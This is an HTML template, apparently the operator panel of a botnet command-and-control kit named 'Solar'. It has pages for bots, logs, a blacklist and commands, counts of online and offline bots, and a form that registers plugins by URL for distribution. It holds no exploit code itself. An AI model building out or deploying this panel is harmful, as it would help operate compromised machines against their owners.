<!DOCTYPE html>
<html lang="en">
<head>
<title>Solar</title>

<script type="text/javascript" src="./data/js/jquery-1.7.1.min.js"></script>
<script type="text/javascript" src="./data/js/ui/jquery-ui-1.8.17.custom.min.js"></script>
<script type="text/javascript" src="./data/js/jquery.corner.js"></script>
<script type="text/javascript" src="./data/js/jquery.validate.js"></script>
<script type="text/javascript" src="./data/js/css_browser_selector.js"></script>
<script type="text/javascript" src="data/js/jqtransformplugin/jquery.jqtransform.js"></script>
<script type="text/javascript" src="./data/js/jquery.jqplot.min.js"></script>
<script type="text/javascript" src="./data/js/plugins/jqplot.highlighter.min.js"></script>
<script type="text/javascript" src="./data/js/plugins/jqplot.cursor.min.js"></script>
<script type="text/javascript" src="./data/js/plugins/jqplot.pieRenderer.min.js"></script>
<script type="text/javascript" src="./data/js/plugins/jqplot.dateAxisRenderer.min.js"></script>
<script type="text/javascript" src="./data/js/editor/jquery.cleditor.min.js"></script>
<script type="text/javascript" src="./data/js/fancybox/jquery.fancybox-1.3.4.pack.js"></script>
<script type="text/javascript" src="./data/js/fancybox/jquery.easing-1.4.pack.js"></script>
<script type="text/javascript" src="./data/js/js.js"></script>

<link rel="stylesheet" href="./data/css/reset.css" type="text/css" />
<link rel="stylesheet" href="./data/css/grid.css" type="text/css" />
<link rel="stylesheet" href="./data/css/style.css" type="text/css" />
<link type="text/css" href="./data/js/ui/admincp/jquery-ui-1.8.17.custom.css" rel="stylesheet" />
<link rel="stylesheet" href="./data/js/plugins/jquery.jqplot.min.css" type="text/css" />
<link rel="stylesheet" href="./data/js/editor/jquery.cleditor.css" type="text/css" />
<link rel="stylesheet" href="data/js/jqtransformplugin/jqtransform.css" type="text/css" />
<link rel="stylesheet" href="./data/js/fancybox/jquery.fancybox-1.3.4.css" type="text/css" />

<meta charset="UTF-8"></head>
<body>
	<div id="main" class="container_12"><!-- Body Wrapper Begin -->
		<div id="header"><!-- Header Begin -->
			<div class="grid_3"><a href="#" id="logo" class="float_left">Solar</a></div>
			<div class="grid_4 push_5">
			</div>
		</div><!-- Header End -->
		<div class="clear"></div>
		<div id="userbar"><!-- Userbar Begin -->
			<div id="profile"><!-- Profile Begin -->
				<div id="avatar">
					<img src="./img/test_avatar2.jpg" alt="Avatar" height="44" />
				</div>
				<div id="profileinfo">
					<h3 id="username">%USERNAME%</h3>
					<span id="subline">%IPADDRESS%</span>
					<div class="clear"></div>
					<a href="?logout" class="profilebutton">Logout</a>
				</div>
			</div><!-- Userbar End -->
			<ul id="navigation"><!-- Main Navigation Begin -->
				<li><a href="./?stats" class="icon_stats">Statistics</a></li>
				<li><a href="./?bots" class="icon_users">Bots</a></li>
				<li><a href="./?logs" class="icon_comment">Logs</a></li>
				<li><a href="./?blacklist" class="icon_settings">Blacklist</a></li>
				<li><a href="./?commands" class="icon_calendar">Commands</a></li>
				<li class="activepage"><a href="./?plugins" class="icon_folder">Plugins</a></li>
				<li><a href="./?logout" class="icon_logout">Logout</a></li>
			</ul><!-- Main Navigation End -->
		</div><!-- Userbar End -->
		<div class="clear"></div>
		<div class="warning grid_12"><h3>%TOTAL% total bot(s) / %ONLINE% online bot(s) / %OFFLINE% offline bot(s) / %PONLINE%% online ratio</h3><a href="#" class="hide_btn">&nbsp;</a></div><!-- Notification -->
		<div id="body">
			<div class="block grid_3"><!-- Block Begin -->
				<div class="titlebar">
					<h3>Add Plugin</h3>
					<a href="#" class="toggle">&nbsp;</a>
				</div>
				<div class="block_cont">
					<form class="form" action="?plugins" method="POST">				
						<div class="form_row"><label style='color: #fff;'>Plugin Name:</label><input class="input required" type="text" style="width: 140px;" name="c"/></div>
						<div class="clear"></div><br />
						<div class="form_row"><label style='color: #fff;'>URL:</label><input class="input required" type="text" style="width: 140px;" name="p"/></div>
						<div class="clear"></div><br />
						<div class="form_row"><input type="submit" class="submit" value="Submit" /></div>
					</form>
				</div>
			</div><!-- Block End -->
			<div class="block grid_9"><!-- Block Begin -->
				<div class="titlebar">
					<h3>Active Plugins</h3>
					<a href="#" class="toggle">&nbsp;</a>
				</div>
				<div class="block_cont">
					<div class="table"><table><!-- Table Wrapper Begin -->
						<thead><tr>
							<th></th>
							<th>Plugin</th>
							<th>Issued On</th>
							<th width="18"></th>
							<th>Issued By</th>
							<th width="18"></th>
						</tr></thead>
						%ROWS%
					</table></div><!-- Table Wrapper End -->
				</div>
			</div><!-- Block End -->
	</div><!-- Body Wrapper End -->
	
</body>
</html>